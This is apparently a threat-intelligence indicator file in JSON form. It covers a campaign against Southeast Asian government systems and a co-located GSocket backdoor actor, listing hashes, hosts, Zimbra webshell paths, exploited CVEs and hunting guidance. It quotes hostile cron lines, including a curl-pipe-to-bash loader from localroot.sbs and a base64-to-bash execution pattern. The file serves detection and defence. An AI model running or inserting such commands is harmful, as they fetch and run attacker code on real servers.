{
  "metadata": {
    "malware_name": "SE-Asia Government Exploitation Toolkit",
    "family": "Operator exploitation/staging toolkit (unattributed) + co-located GSocket second-actor implants",
    "campaign_id": "seasia-gov-exploitation-toolkit-144-172-106-236",
    "report_date": "2026-07-17",
    "analyst": "The Hunters Ledger",
    "confidence": "HIGH",
    "tlp": "CLEAR",
    "actor": "UNATTRIBUTED",
    "notes": "Two distinct actor sets are represented and MUST be kept separate. (1) The reported operator: a single hands-on-keyboard operator running a four-country (ID/TH/MY/PH) government-targeting campaign from 144.172.106.236. (2) A co-located, MODERATE-likely SEPARATE second intruder whose GSocket/THC backdoor kit (localroot.sbs / cat.sh + /home/nast/* implants) was found on the shared victim svr1.nast.ph. Second-actor indicators are flagged 'second_actor': true and must not be folded into the operator's TTP set. Commodity chisel.exe hash is shared by 179 VT submitters — HUNT only, not an attribution or block anchor; its VT relationships are shared-tool noise. See stage1-malware-analyst.md Section 7.4 for the full hard-exclusion list enforced here."
  },
  "file_hashes": {
    "sha256": [
      {
        "value": "e788f829b1a0141a488afb5f82b94f13035623609ca3b83f0c6985919cd9e83b",
        "filename": "chisel.exe",
        "type": "PE32+ Go executable",
        "confidence": "LOW",
        "action": "HUNT",
        "false_positive_risk": true,
        "context": "Commodity Chisel tunnel (VT 55/71, Hacktool.Chisel). Shared by 179 VT submitters/166 sources since 2024-10-07 — worthless for attribution and MUST NOT be blocked or used as an operator anchor. Its VT contacted_ips/itw_ips/similar_files are shared-tool noise. Present in the operator toolkit; hunt only. Also trips PoetRat_Python/android_meterpreter YARA = known false positives."
      },
      {
        "value": "23560e13d06d8153e0e7566d153ffe9eec79e08eb1ed18f8cd1417728e7dbdd6",
        "filename": "tunnel-server",
        "type": "ELF64 Go executable",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator's self-built multi-agent reverse-tunnel + SOCKS5 server (module tunnel-proxy/pkg/mux). Listens :9443 control + :1080 SOCKS5, no-auth, no-TLS. Never carried victim traffic in 14 days of logs. Trips PoetRat_Python/android_meterpreter YARA = false positives."
      },
      {
        "value": "c600f8e4ee5ece27ce777fe4f69c18c6611768ee7192c74e4e66f9e236e19b1e",
        "filename": "tunnel-agent",
        "type": "ELF64 Go executable",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator's paired tunnel agent, same Go module family (tunnel-proxy/pkg/mux). Trips PoetRat_Python/android_meterpreter YARA = false positives."
      },
      {
        "value": "8a7d387663d7f32730ed8b996f1dab7c2eed4b829b71fd48c608f51569dc4d69",
        "filename": "cat.sh",
        "type": "Shell script (GSocket/THC backdoor loader)",
        "confidence": "HIGH",
        "action": "BLOCK",
        "second_actor": true,
        "context": "SECOND-ACTOR (probably-separate intruder on svr1.nast.ph). VT 19/61 (Symantec Trojan.Gen.NPE, Kaspersky HEUR:Trojan.Shell.Agent.ce), Zenbox Linux MALWARE/EVADER, tags self-delete + detect-debug-environment. GSocket/THC backdoor kit served by localroot.sbs. VT-confirmed 2026-07-17: embeds gsocket.io + gs.thc.org relay + Telegram/Discord/webhook.site + 87.106.101.131. Safe to block/alert."
      }
    ],
    "md5": [
      { "value": "f26c3cd4209492b699131d29b76d941a", "filename": "chisel.exe", "action": "HUNT", "false_positive_risk": true },
      { "value": "d96d4e7bc25704e48576ee7667d424aa", "filename": "tunnel-server", "action": "HUNT" },
      { "value": "157ff784cd1736f401e54cd2aa3cde38", "filename": "tunnel-agent", "action": "HUNT" },
      { "value": "0d72d798449356ed66410f7e84c4a37a", "filename": "cat.sh", "action": "BLOCK", "second_actor": true }
    ],
    "sha1": [
      { "value": "c787636df481e1075db49c96d696de8dc6198e26", "filename": "chisel.exe", "action": "HUNT", "false_positive_risk": true },
      { "value": "c640fed8c76802f2bea562ff08a0643d8f033771", "filename": "tunnel-server", "action": "HUNT" },
      { "value": "886504ea793ae05bb8206f383a3140e8d7bddd45", "filename": "tunnel-agent", "action": "HUNT" },
      { "value": "71760ce87e12cb881c2316034be0d016617f7628", "filename": "cat.sh", "action": "BLOCK", "second_actor": true }
    ]
  },
  "network_indicators": {
    "ipv4": [
      {
        "value": "144.172.106.236",
        "port": 9999,
        "protocol": "TCP",
        "purpose": "Operator VPS / open-directory origin",
        "confidence": "DEFINITE",
        "action": "MONITOR",
        "notes": "AS14956 RouterHosting LLC / Cloudzy (US), block 144.172.96.0/20. Single dedicated operator box (only identified dedicated asset). Operator listener map: :9443 tunnel control, :1080 SOCKS5 no-auth, :8443/:4443 chisel, :8080 SSRF canary, :4444/:80/:443 ncat, :9999 open dir. SSH live through 2026-07-14; :9999 open dir pulled early July 2026."
      },
      {
        "value": "87.106.101.131",
        "protocol": "TCP",
        "purpose": "IP embedded in second-actor cat.sh loader",
        "confidence": "MODERATE",
        "action": "HUNT",
        "second_actor": true,
        "notes": "Extracted by VirusTotal from cat.sh. HUNT-tier; associated with the second-actor GSocket kit, not the reported operator."
      }
    ],
    "ipv6": [],
    "domains": [
      {
        "value": "localroot.sbs",
        "purpose": "Second-actor loader / staging domain",
        "confidence": "HIGH",
        "action": "BLOCK",
        "second_actor": true,
        "notes": "Cloudflare-fronted (arya/lee.ns.cloudflare.com; A 172.67.199.181, 104.21.52.137; AAAA 2606:4700:3035::). Registered 2025-08-17. VT 0/91 — completely unflagged by every engine, so no vendor will catch it. Serves cat.sh (only downloaded file per VT). BLOCK the domain; do NOT block the Cloudflare IPs."
      },
      {
        "value": "utah01-maas.cloudzy.com",
        "purpose": "Operator box's own Cloudzy MAAS-assigned hostname",
        "confidence": "MODERATE",
        "action": "HUNT",
        "false_positive_risk": true,
        "notes": "Resolves to 144.172.106.236 itself (288 self-lookups in the operator's localhost DNS log). Cloudzy provider infrastructure hostname, not a C2 domain — context/hunt only, do not block."
      }
    ],
    "urls": [],
    "email_addresses": [
      {
        "value": "security-monitor@tni.mil.id",
        "purpose": "Spoofed phishing sender (Lemhannas / TNI pretext)",
        "confidence": "HIGH",
        "action": "MONITOR",
        "notes": "Operator-spoofed Indonesian Armed Forces sender used in deliver.py Zimbra malware-delivery and the phish_server.py 'Zimbra Security Update' lure. Detect as a spoofed-sender indicator, not as an attacker mailbox."
      }
    ],
    "user_agents": []
  },
  "hunt_only_never_block": {
    "note": "Shared public infrastructure with vast legitimate use. Presence of a GSocket relay connection FROM a server-class host with no interactive user is the signal — the domains themselves are not. NEVER place these on a block list or ship as campaign IOCs. Second-actor (GSocket/THC kit) context only.",
    "domains": [
      "gsocket.io",
      "cdn.gsocket.io",
      "g.gs.thc.org",
      "p.gs.thc.org",
      "z.gs.thc.org",
      "master.gs.thc.org",
      "api.telegram.org",
      "discord.com",
      "webhook.site",
      "raw.githubusercontent.com",
      "github.com"
    ]
  },
  "host_indicators": {
    "file_paths": [
      {
        "value": "/home/nast/netd",
        "confidence": "HIGH",
        "action": "HUNT",
        "second_actor": true,
        "context": "Second-actor daemon-masquerade implant on svr1.nast.ph, invoked from cron via base64 indirection"
      },
      {
        "value": "/home/nast/authd",
        "confidence": "HIGH",
        "action": "HUNT",
        "second_actor": true,
        "context": "Second-actor daemon-masquerade implant on svr1.nast.ph"
      },
      {
        "value": "/home/nast/bootcfg",
        "confidence": "HIGH",
        "action": "HUNT",
        "second_actor": true,
        "context": "Second-actor daemon-masquerade implant on svr1.nast.ph"
      },
      {
        "value": "/home/nast/udevd-sync",
        "confidence": "HIGH",
        "action": "HUNT",
        "second_actor": true,
        "context": "Second-actor daemon-masquerade implant on svr1.nast.ph. Generalize: executables in a user home directory bearing system-daemon names never belong there."
      },
      {
        "value": "/opt/zimbra/jetty/webapps/zimbra/public/shell.jsp",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator Zimbra CVE-2022-41352 webshell drop path (Lemhannas). Delivery attempted, success unconfirmed — hunt to determine if it landed."
      },
      {
        "value": "/opt/zimbra/jetty/webapps/zimbra/shell.jsp",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator Zimbra CVE-2022-41352 webshell drop path (1 of 7)"
      },
      {
        "value": "/opt/zimbra/jetty_base/webapps/zimbra/public/shell.jsp",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator Zimbra CVE-2022-41352 webshell drop path (1 of 7)"
      },
      {
        "value": "/opt/zimbra/jetty_base/webapps/zimbra/shell.jsp",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator Zimbra CVE-2022-41352 webshell drop path (1 of 7)"
      },
      {
        "value": "/opt/zimbra/mailboxd/webapps/zimbra/public/shell.jsp",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator Zimbra CVE-2022-41352 webshell drop path (1 of 7)"
      },
      {
        "value": "/opt/zimbra/mailboxd/webapps/zimbra/shell.jsp",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator Zimbra CVE-2022-41352 webshell drop path (1 of 7)"
      },
      {
        "value": "/opt/zimbra/jetty-distribution-9.4.46.v20220331/webapps/zimbra/public/shell.jsp",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator Zimbra CVE-2022-41352 webshell drop path (1 of 7). jetty-distribution version = the Zimbra build the operator expected."
      },
      {
        "value": "/tmp/proxylogon-loop",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator staging dir for the failed Exchange ProxyLogon SSRF loop"
      },
      {
        "value": "/tmp/sipede_docs/",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator staging dir for exfiltrated Kejaksaan correspondence PDFs"
      },
      {
        "value": "/tmp/vpn_cookies.txt",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator staging for harvested Ivanti DSID VPN session cookies"
      },
      {
        "value": "/tmp/creds_result.txt",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator credential-validation output (recorded MHESI authenticated access)"
      },
      {
        "value": "/tmp/exploit.cpio",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator staging for the Zimbra CVE-2022-41352 7-path cpio weapon"
      }
    ],
    "cron_patterns": [
      {
        "value": "curl https://localroot.sbs/cat.sh | bash",
        "confidence": "DEFINITE",
        "action": "HUNT",
        "second_actor": true,
        "context": "Second-actor remote loader cron entry on svr1.nast.ph"
      },
      {
        "value": "{ echo <base64> | base64 -d | bash;} 2>/dev/null >/dev/null",
        "confidence": "HIGH",
        "action": "HUNT",
        "second_actor": true,
        "context": "Second-actor generic cron pattern: base64-indirected execution with both streams suppressed. Durable behavioral anchor (Robustness >= 2), better than the literal implant paths. Base64->plaintext: Jy9ob21lL25hc3QvbmV0ZCcK=/home/nast/netd, Jy9ob21lL25hc3QvYXV0aGQnCg===/home/nast/authd, Jy9ob21lL25hc3QvYm9vdGNmZycK=/home/nast/bootcfg, Jy9ob21lL25hc3QvdWRldmQtc3luYycK=/home/nast/udevd-sync"
      }
    ],
    "ssh_host_key_fingerprints": [
      { "value": "ED25519:84FDB939...23B7", "confidence": "HIGH", "action": "HUNT", "context": "Operator SSH host key on 144.172.106.236 (banner OpenSSH_9.6p1 Ubuntu-3ubuntu13.16). Unique to this IP (no sibling reuse in Hunt.io corpus). Full fingerprint in vault working notes; flag reuse on sibling hosts." },
      { "value": "RSA:55F5EE6E...52FA", "confidence": "HIGH", "action": "HUNT", "context": "Operator SSH host key on 144.172.106.236" },
      { "value": "ECDSA:B78E7D40...7D1F", "confidence": "HIGH", "action": "HUNT", "context": "Operator SSH host key on 144.172.106.236" }
    ],
    "ssh_authorized_key_fingerprints": [
      { "value": "SHA256:b2sH9INFA/+b9jwMiiTmJoNFaC6SuKI3zc+SDgsBGCE", "confidence": "HIGH", "action": "HUNT", "context": "Operator injection pubkey (redis_key.pub, comment root@ubuntu-Utah-1gb, RSA-3072). Hunt authorized_keys on ANY host, especially root; presence = operator backdoor SSH access." },
      { "value": "SHA256:YxKzdruIAqko5v19o1I9P98ie7XA1WdNwpAG+TjAA0o", "confidence": "MODERATE", "action": "HUNT", "context": "id_rsa_nast private key fingerprint. ASSESSED (not proven) to be the operator's NAST access key." }
    ],
    "tls_key_fingerprints": [
      { "value": "yW2X8fCVTmfMSpVyrhZQGkSTCfBJBMSyQtgPzCMCfuw=", "confidence": "HIGH", "action": "HUNT", "context": "chisel SERVER key fingerprint on :8443 (chisel.log). Operator-generated, survives IP changes — durable attribution anchor (unlike the commodity chisel.exe hash). Flag reuse anywhere." },
      { "value": "rEVojNCdmii9193KJQL0CQdIcudwm3RW32BKJlUgLT4=", "confidence": "HIGH", "action": "HUNT", "context": "chisel SERVER key fingerprint on :4443 (reverse tunnelling, chisel-reverse.log). Second distinct operator-generated key." }
    ],
    "content_strings": [
      { "value": "Zimbra Security Monitor v3.1 -- System Diagnostics", "confidence": "HIGH", "action": "HUNT", "context": "Operator-authored JSP webshell decoy banner, embedded in every exploit.cpio member. Zero legitimate use — the single best hunting string in the case. Also ties the webshell to the phish lure branding and spoofed security-monitor@tni.mil.id sender." },
      { "value": "tunnel-proxy/pkg/mux", "confidence": "HIGH", "action": "HUNT", "context": "Operator custom Go tunnel module path, embedded in both ELF64 tunnel binaries." }
    ],
    "mutex_names": [],
    "service_names": [],
    "scheduled_tasks": [],
    "named_pipes": []
  },
  "cves_confirmed_in_code": [
    { "id": "CVE-2023-46805", "product": "Ivanti Connect Secure", "note": "Auth-bypass path traversal, chained with CVE-2024-21887 against vpn.mhesi.go.th" },
    { "id": "CVE-2024-21887", "product": "Ivanti Connect Secure", "note": "Command injection" },
    { "id": "CVE-2024-28149", "product": "Tableau Server", "note": "File read; rbportal/Kong token request FAILED (invalid_grant)" },
    { "id": "CVE-2024-51758", "product": "Tableau Server", "note": "SAML bypass" },
    { "id": "CVE-2022-41352", "product": "Zimbra (Amavis cpio)", "note": "7-path cpio webshell weapon vs mailweb.lemhannas.go.id; delivery attempted, success unconfirmed" },
    { "id": "CVE-2020-25627", "product": "Moodle", "note": "XSS; referenced in code, no exploitation evidenced" },
    { "id": "CVE-2020-25629", "product": "Moodle", "note": "PrivEsc; referenced in code, no exploitation evidenced" },
    { "id": "CVE-2020-25630", "product": "Moodle", "note": "Unauth LFI; referenced in code, no exploitation evidenced" },
    { "id": "CVE-2021-26855", "product": "Microsoft Exchange (ProxyLogon)", "note": "Confirmed by SSRF technique in exploit_loop.sh; ATTEMPT FAILED against RTAF/RTARF (411/400/404/401)" }
  ],
  "excluded_indicators": {
    "note": "Recorded so downstream stages do not re-add them. Each is shared public infrastructure, a provider artifact, victim-side data, or scanner noise — NOT operator or target infrastructure. Do not place in any block rule or CERT material.",
    "items": [
      { "value": "c739f55d53b632bddc229a332a5165d006ae14cdabe6740a9048619394ac3b93", "reason": "VPNJantit's PUBLIC VPN-node certificate — would flag every VPNJantit user worldwide (Censys returns 1 host)" },
      { "value": "128.199.246.46", "reason": "Public VPNJantit free-VPN exit node the operator connected THROUGH (usable only as a source IP, never operator-owned)" },
      { "value": "146.56.180.42", "reason": "Shared Hysteria2 circumvention proxy the operator used upstream (not operator-owned)" },
      { "value": "serveo.net", "reason": "Public free SSH reverse-tunnel relay" },
      { "value": "43.208.251.115", "reason": "AWS-Thailand SOCKS5 'Thai VPS' candidate — ownership INSUFFICIENT; operator could not even connect" },
      { "value": "119.59.99.87", "reason": "Confirmed VICTIM host (Thai WordPress), not operator infrastructure — victim-notification context only" },
      { "value": "103.146.204.15", "reason": "RTA SSH brute TARGET (failed), not operator infrastructure" },
      { "value": "bootyreader.com", "reason": "Unrelated Moroccan spam co-tenant of the recycled IP" },
      { "value": "140.99.255.48", "reason": "bootyreader.com's host" },
      { "value": "bsre.bssn.go.id / bsre.go.id / va.bsre.go.id / crl.rootca.id", "reason": "BSSN's own e-signature CA / Indonesian root CA — appears only as stolen-PDF signature metadata; NOT targets" },
      { "value": "mahkamahagung.go.id (+ www/jdih/putusan)", "reason": "Navigation links inside a captured victim page — Supreme Court NOT targeted" },
      { "value": "esr.menpan.go.id / sicana.kejaksaan.go.id", "reason": "Referenced only in exfiltrated letter bodies" },
      { "value": "ulm.ac.id", "reason": "Email domain of a harvested credential, not a host" },
      { "value": "3.87.27.156 / 167.94.146.54 (Censys) / Linode 66.132.x / 45.33.12.214 / 50.116.26.161 / 172.104.210.105 / 194.195.210.47 / 69.164.217.74 / 194.164.107.4", "reason": "Internet scanner sources in the operator's logs — NOT operator, NOT victim" },
      { "value": "windows-Utah-* / ubuntu-Utah-* cert CNs", "reason": "2,634 hosts across many ASNs incl. AWS — dead attribution signal" },
      { "value": "CVE-2026-68645", "reason": "FABRICATED — appears only as the fake 'security patch' string in the phish_server.py lure, not a real exploited vulnerability" },
      { "value": "ysoserial gadget-chain rules / PoetRat_Python / android_meterpreter YARA", "reason": "No ysoserial in capture (file 'jar' is an empty cookie jar); PoetRat/meterpreter are false positives on chisel and both Go tunnel binaries" }
    ]
  }
}
